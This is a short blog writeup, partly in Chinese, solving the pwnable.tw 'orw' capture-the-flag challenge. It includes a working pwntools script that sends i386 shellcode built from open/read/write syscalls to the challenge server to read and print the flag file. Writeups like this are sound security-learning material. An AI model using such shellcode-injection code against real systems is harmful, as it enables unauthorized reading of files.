Pwnable.tw orw writeup

Grissia Lv2

題目

簡介

Read the flag from /home/orw/flag.
Only open read write syscall are allowed to use.

pwnable.tw_orw

題解

總之就是你丟什麼他就執行什麼
但是只能用 read/write/open

Exploit

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
from pwn import *
context.arch = "i386"
r = remote("chall.pwnable.tw", 10001)

# 使用 shellcraft 生成 shellcode
# 讀取並輸出 50 個 byte
sc = asm(
shellcraft.i386.linux.open(b'/home/orw/flag') +
shellcraft.i386.linux.read('eax', 'esp', 50) +
shellcraft.i386.linux.write('1', 'esp', 50)
)

r.sendlineafter(b':', sc)
print(r.recvuntil(b'}'))

r.interactive()
  • 標題: Pwnable.tw orw writeup
  • 作者: Grissia
  • 撰寫于 : 2024-11-10 11:56:07
  • 更新于 : 2024-11-17 20:20:48
  • 連結: https://grissia.github.io/2024/11/10/Pwnable-tw-orw-writeup/
  • 版權宣告: 本作品采用 CC BY-NC-SA 4.0 进行许可。
此頁目錄
Pwnable.tw orw writeup